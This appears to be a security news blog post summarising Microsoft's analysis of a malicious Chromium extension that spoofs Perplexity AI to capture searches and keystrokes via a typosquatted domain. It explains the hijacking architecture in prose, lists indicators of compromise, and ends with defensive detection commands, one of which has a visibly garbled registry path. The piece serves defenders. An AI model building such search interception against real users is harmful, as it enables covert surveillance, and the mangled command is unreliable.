Hidden AI Search Trap: The Malicious Chromium Extension Spoofing Perplexity AI and Hijacking User Queries + Video

Listen to this Post

🐢▶️ Listen🚀

Emotional Introduction: When “AI Search” Becomes a Silent Surveillance Tool

In an era where artificial intelligence tools are rapidly becoming part of everyday browsing habits, trust is the new currency—and the easiest to steal. A recent investigation by Microsoft Threat Intelligence reveals a disturbing case where a Chromium-based extension disguised itself as an AI-powered search assistant under the Perplexity AI branding. Instead of improving search, it quietly intercepted user queries, collected behavioral data, and rerouted traffic through attacker-controlled infrastructure. What looked like innovation was, in reality, a carefully engineered surveillance pipeline hidden inside the browser itself.

Summary of the Incident: What Actually Happened

Microsoft researchers discovered a malicious browser extension named “Search for perplexity ai” that impersonated Perplexity AI. The extension used typosquatted infrastructure (perplexity-ai[.]online) to intercept search queries and real-time keystrokes typed into the browser’s address bar.

Instead of directly sending users to legitimate search engines, the extension first routed all queries through attacker-controlled servers. These servers logged full request metadata—including IP addresses, headers, and typed characters—before redirecting users to normal search results. This created a “silent interception layer” that users never noticed.

Although no direct credential theft was confirmed, the architecture clearly enabled large-scale behavioral tracking and potential profiling.

Extension Overview: A Fake AI Tool with Real Control

The extension appeared legitimate at first glance, presenting itself as an AI-enhanced search assistant. It even forced itself as the default search provider inside Chromium-based browsers.

Key attributes included:

Name: Search for perplexity ai

Extension ID: flkebkiofojicogddingbdmcmkpbplcd

Manifest Version: MV3

Infrastructure: perplexity-ai[.]online

The extension spoofed branding from Perplexity AI, misleading users into believing it was affiliated with a trusted AI product. In reality, it functioned as a traffic interception and data collection system.

How Search Hijacking Worked Behind the Scenes

The extension manipulated Chromium’s search configuration using chrome_settings_overrides, forcing all searches through attacker infrastructure.

Every query followed this path:

User types → Browser Omnibox → attacker domain → logging → redirect → real search engine

Even more concerning, the suggest_url feature captured every keystroke in real time, meaning partial queries were transmitted before the user pressed Enter.

This is no longer simple search hijacking. It is behavioral telemetry capture disguised as search assistance.

Two-Hop Redirection: The Invisible Data Theft Pipeline

The extension used a “two-hop” system:

Query is sent to attacker-controlled domain

Server logs full request data

Immediate redirect to legitimate search engine

This ensures users see normal results while unaware of interception.

The attacker gains:

Search intent profiling

Typing behavior patterns

Device fingerprinting

Network metadata

This separation between “data capture” and “user experience” is what makes the attack particularly stealthy.

Abuse of DeclarativeNetRequest APIs

The extension leveraged powerful MV3 APIs:

declarativeNetRequest

declarativeNetRequestFeedback

declarativeNetRequestWithHostAccess

These allowed:

Real-time URL rewriting

Traffic interception

Rule execution monitoring

Domain-level request control

Such permissions are highly unusual for a search tool and indicate deliberate architectural planning for surveillance rather than functionality.

Modular Attack Infrastructure: Designed for Expansion

The extension included rule sets for multiple search engines:

Perplexity

Google

Bing

Although only Perplexity rules were active, the structure allowed instant activation of additional hijacking targets.

This modular design suggests a scalable framework rather than a single-purpose malicious tool.

Server-Side Logging: The Proof of Intent

Unlike typical browser malware, this extension shipped with full backend infrastructure:

Node.js server logging every request

Nginx proxy handling search suggestions

SSL configuration via Let’s Encrypt

CORS manipulation for cross-origin access

This confirms intentional data harvesting. The system was not improvised—it was engineered.

Dynamic Behavior: Onboarding as Psychological Manipulation

When installed, the extension redirected users to a fake onboarding page mimicking legitimate setup flows.

Hosted on a deceptive domain, it reinforced trust while quietly modifying browser settings in the background. This is a classic social engineering tactic: build comfort first, then execute control.

Security Implications: Why This Attack Matters

This incident highlights a deeper trend in modern cyber threats:

AI branding increases user trust

Browser extensions remain highly privileged

MV3 APIs still enable complex abuse

Keystroke-level data is now interceptable without malware flags

Even without credential theft, the harvested data is enough for:

Behavioral profiling

Targeted advertising manipulation

Future phishing personalization

Mitigation Strategies from Microsoft

Microsoft recommends:

Restricting extension installation via enterprise policies

Enforcing allow-lists for browser add-ons

Monitoring search provider changes

Blocking unknown intermediary domains

Using reputation-based filtering systems

Deploying Microsoft Defender SmartScreen protections

These layered defenses aim to detect both known threats and behavioral anomalies.

What Undercode Say:

Browser extensions are now equivalent to lightweight malware if misused

AI branding significantly lowers user suspicion thresholds

MV3 security model still allows deep request interception

Typosquatting remains one of the most effective social engineering tools

Search hijacking has evolved into behavioral surveillance

Keystroke capture can occur without traditional keyloggers

Users rarely inspect suggest_url behavior in extensions

Redirect-based attacks hide data theft behind legitimate services

Modular rule engines indicate reusable cybercrime infrastructure

Search engines are now indirect data collection endpoints

“AI assistant” labeling is being exploited as trust camouflage

Browser APIs remain a high-value attack surface

Server-side logging is often the real payload, not the extension itself

Security awareness training must include extension hygiene

Extension onboarding pages are psychological trust traps

DNS-like domain mimicry increases install rates

Real-time suggestions are more sensitive than search queries

Default search override is a persistent control vector

Multi-engine hijacking frameworks suggest scalability goals

CORS misconfiguration enables cross-origin data flow abuse

Proxy-based logging hides malicious intent from client-side inspection

Extension stores remain reactive, not proactive in enforcement

AI-themed extensions are disproportionately risky

User behavior data is more valuable than credentials in many cases

Two-hop redirect architecture reduces detection probability

Security telemetry often misses short-lived query interception

Browser trust boundaries are increasingly blurred

MV3 reduces but does not eliminate abuse potential

Threat actors prioritize stealth over disruption

Search suggestions are an underprotected data channel

Extension permissions are rarely audited by users

Branding impersonation is more effective than phishing links

Infrastructure separation hides attribution signals

Logging headers provides deep fingerprinting capability

AI hype cycles accelerate malware distribution success

Enterprise environments are not immune without strict controls

User experience continuity masks malicious interception

Search hijacking now functions as intelligence gathering

Detection requires behavioral, not signature-based systems

Browser extensions remain one of the most underestimated threats

❌ The extension is confirmed malicious based on Microsoft analysis and was taken down after disclosure.

❌ It does not need credential theft to be dangerous; search and keystroke interception alone are high-risk.

⚠️ While no direct password theft was observed, the logging infrastructure enables potential future abuse or expansion of capabilities.

Overall assessment: The technical findings strongly support the claim of intentional data interception and search hijacking behavior, with multiple independent indicators confirming malicious design patterns.

Prediction:

(+1) AI-themed browser extensions will become a primary vector for stealth data collection campaigns.

Attackers will increasingly rely on brand impersonation, especially AI tools, to bypass user skepticism.

More extensions will adopt MV3-compliant “legitimate-looking” architectures

Search interception will evolve into full behavioral analytics pipelines

AI branding will continue to reduce detection probability among non-technical users

🔮 The next wave of browser threats will likely look less like malware—and more like productivity tools.

Deep Analysis (Security Engineering & Detection Commands)

Check installed Chromium extensions (Linux)
ls ~/.config/google-chrome/Default/Extensions/

Inspect suspicious extension ID

cat ~/.config/google-chrome/Default/Extensions/flkebkiofojicogddingbdmcmkpbplcd/manifest.json

Monitor DNS requests for typosquatted domains

sudo tcpdump -i any host perplexity-ai.online

Windows: list installed extensions via registry

reg query HKCU\Software\Google\Chromextensions

Detect outbound traffic to unknown search intermediaries

netstat -ano | findstr ":443"

macOS: check Chrome extension directory

ls ~/Library/Application\ Support/Google/Chrome/Default/Extensions/

Hunt for search hijacking behavior (enterprise logs)

DeviceNetworkEvents

| where RemoteUrl contains perplexity-ai

Detect browser setting modifications

grep -R "search_provider" ~/.config

▶️ Related Video (78% Match):

🕵️‍📝Let’s dive deep and fact‑check.

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

References:

Reported By: www.microsoft.com
Extra Source Hub (Possible Sources for article):
https://stackoverflow.com
Wikipedia
OpenAi & Undercode AI

Image Source:

Unsplash
Undercode AI DI v2

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeNews & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky | 🐘Mastodon | 📺Youtube